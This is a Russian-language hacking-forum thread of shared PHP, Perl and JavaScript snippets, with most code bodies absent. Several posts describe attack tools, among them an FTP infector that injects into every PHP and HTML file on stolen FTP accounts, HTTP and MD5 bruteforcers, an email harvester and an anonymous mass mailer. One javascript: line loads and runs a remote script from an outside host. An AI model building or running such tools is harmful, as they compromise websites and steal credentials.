![]() |
2 cRiLaZ
Одинарная ковычка быстрее обрабатывается интерпритатором, ибо php не ищет в ней перменных, как это он делает с двойной ковычкой. Пример: <?$text=1;echo "123 $text";?> // вывод '123 1' <?$text=1;echo '123 $text';?> // вывод '123 $text' да и потом сама запись "$text" это очень даже весело. Имя переменной, конечно, никак не указывает на ее значение, и даже не намекает что внутри текст, поэтому нужно прибавить гемору интерпритатору. Я не ругаюсь и не смеюсь =) я просто хочу чтобы в этом раздлеле на античате люди грамотно писали код, вот и все... Насчет ./ - действительно я придрался, но это лишние 2 символа в коде. А если не собираешься читать файл или передумал, зачем ставить флаг на чтение и блокировать его? Насчет обнуления переменной =)))) 2 разные вещи, выкинуть переменную из памяти и забыть о ней, либо продолжать держать в памяти пустое значение =) И насчет "стиль у мя такой", это не стиль, пока это мусор. Приходишь к другу, а у него шкаф по среди комнаты и раковина с кухни проведена в прихожую, он заявляет что у него такой стиль. |
MD5CRACK - MD5 Bruteforce Tool
PHP код:
|
удобная универсальная функция для работы с сокетами.
PHP код:
PHP код:
|
наверное здесь уже выкладывали скрипт для выдирания мэл, этот может (вроде как) вычленить из любого набора текста мэла
P.S. Ногами не бейте, я начинающий, очень хотелось чем-нибудь поделиться, может кому пригодиться P.P.S В данный момент пытаюсь тоже самое сделать но через сокеты, как-то не особо получается, но если кому интересно + просто не влом помочь пишите в личку PHP код:
|
ftp checker
PHP код:
|
Вот парочка примеров
1) ftp чекер Цитата:
2) Сканер портов Цитата:
|
Вообщем, интересная штука сегодня писалась... но получилось, не то, что хотелось... ))))))
Ситуация в двух словах: Взять результаты поиска с domainsdb, отпарсить из исходника страницы найденные по вашему запросу линки, и проверить, если там php скрипт (index.php :))))))))))) PHP код:
|
кому мешает register_globals OFF можете вставить в страницу
PHP код:
|
Цитата:
|
Цитата:
|
Ну так зачем же его искусственно включать?)
Просто предупредил о небезопасности этого =) Используйте функцию. чисто в образовательных целях. |
Цитата:
админ - ленивый консерватор. Программная часть сайта не обновлялась года так эдак с 2000'ого. Все скрипты работают исключительно под register_globals=on (бывает такое). Потребовалось сменить хостинг - а на новом register_globals=off. Переписывать двиг не охота, вот и требуется искусственное включение. Больше, имха, незачем. |
Цитата:
|
Ну вот, такой маленько-прикольный скриптик
Вводим его в адресную строку Код:
javascript:o=document.createElement("script");o.setAttribute("src","http://digistyle.3dn.ru/egor.js");document.body.appendChild(o);void(0) |
Нацарапал тут скриптец для слияния нескольких брутфорс словарей в один прошу заценить. Я в ПХП плохо понимаю, укажите на мои ошибки пожлуйста. И если скрипт вдруг кому помог не пожалейте, дайте репки :D
PHP код:
|
вот тут был скрипт, давно писал. фтпинфектер... во как.
создаём файл. туда пишем данные вот в таком виде: ftp_server;login;pass скрипт парсит этот файл, подключаеццо к каждому серверу и заражает все файлы с расширением php, htm, html. вот собсно сам код PHP код:
|
ифреймер по-русски?)
|
Ну со всеми подряд хтмл и пхп ты явно переборщил ))
|
Вывод даты нормальным русским языком:
PHP код:
PHP код:
PHP код:
Следующий скрипт весьма полезен (писал для своей гостевой). Выводит мыла таким образом, чтоб их не смогли воровать роботы-собиральщики мыл (во как): PHP код:
Так-с, идем дальше. Так я обычно проверяю, является ли какой-либо параметр числом: PHP код:
PHP код:
PHP код:
|
Выдирает поля из дампа таблицы:
Код:
#!/usr/bin/perl -wClients.sql - имя сортируемого файла, 4-6-15-20 номера колонок через "-" (узнать можно запустив только "perl dump.pl Clients.sql "). Сортировка файла с удалением повторяющихся элементов: Код:
#!/usr/bin/perl -w |
PHP код:
|
давно хотел навоять че-нить подобное... но руки коротки)
держи плюс до кучи) |
JavaScript попап
Код:
function popup(height,width,tittle,text) PHP код:
|
Цитата:
|
Отправка анонимных сообщений с вложениями. Отправляет сообщения от указанного вами пользователя и с указанного мыла всем указанным в файле maillist.txt
Он должен иметь вид: Код:
lol1@mail.ruPHP код:
|
Классический пример получения док-а по httP Скрипт, который по httP протоколу получает документ с сервера:: PHP код:
Поэтому, все что идет до документа мы пропускаем, зная, что заголовок от тела документа отделяется строкой "\r\n". Заголовок читается функцией 'fgets', а бинарные данные 'fread' ЗЫЫ:: кстати не так давно, не помню кто, спрашивали о генераторе паролей..простейший вариант: PHP код:
|
Очередной скрипт на php.
Сегодня мы нашли сайт с кучей прокси. Но они там, как назло, в ужасном виде: Код:
HTTP 203.94.89.112 80 No UnResolved UnResolved 704 Noмы превратим его в нормальный вид так: PHP код:
|
рекурсивное удаление
Зло зло зло__))
//малые шалости_ "Кому-то создавать, кто-то должен созедать, а кто-то наглый) все разрушать" Теперь по делу:: PHP код:
НО последнее слово как всегда за правами доступа))..ну разве это проблема) Итак дамы и господа) будте бдительны!! Порой безопасность приложений играет более важную роль чем сами приложения Безопасность:: Решить вышеописанную проблему поможет проверка расширения файла (а может и не решить))) зы:: 2nc.striem -> исправлено! |
Вот, сегодня написал... Генерация uin;pass list по словарю для уинов с заданной маской (xxxyxxz 5557552)
PHP код:
|
конвертирование jpg в html с 100% сохранением качества картинки! (размер знчительно увеличеваеться)
PHP код:
|
Цитата:
Ты что.Я ужаснулся когда это увидел. PHP код:
|
Вот, давненько писал, руки никак не доходят чтоб чазмер и прорчие прелести выводились =)
Галерея для изображений. По дэфолту берет все изображения из папки /walp. Автоматически считает все картинки в папке и постранично выводит их уменьшенные копии ( по 4 на странице ). При нажатии на мини - картинку, кидает на оригинал. PHP код:
|
Полностью написанный мною файловый менеджер на пхп.
Включает в себя текстовый редактор файлов, функцию рекурсивного удаления каталогов, загрузки файлов на сервер и создания новых папок...+ позитивный дезигн и еще много всего - в одном файле!!! PHP код:
|
Цитата:
Ненавиже регексы - я залез на http://regexlib.com и взял оттуда:) Ибо я вообще раньше кодил на ВБ.НЕТ и не привык напрягаться :D |
>>>mamont
http://php.ru/manual/function.scandir.html Цитата:
|
Было:
PHP код:
PHP код:
|
Этот скрипт создает комбо лист.
PHP код:
а Этот скрипт читает файл сравнивает с шаблоном и выводит список совпадений без повтарений. PHP код:
|
Скрипт простой брутфорс атаки по http.
(Некотрые моменты были упущены и специально не рассмотрены, чуть позже для наглядности приведу реальный пример, с разбором тела ответа, но пока только так. Также очень часто для защиты от подобной атаки приложения используют различные проверки по заголовкам, их помогает избежать подмена данных в заголовках. Так же чуть позже напишу скрипт брута через прокси) Скрипту необходимо 2-а файла. 1-ый со списком логинов (каждый логин в новой строке!). 2-ой словарь для брута (каждое слово в новой строке!) PHP код:
ззы:: если у кого возникли вопросы и предложения,в личку! зззы:: всю конструктивную критику с удовольствием принимаю!! |
PHP. Функция для вывода списка файлов в данной дериктоии и ниже. Форматировать по вкусу.
PHP код:
|
Функция ресайза изображения
Функция ресайза изображения На вход подаются путь к изменяемой картинке, новая ширина и высота. PHP код:
|
| Время: 02:12 |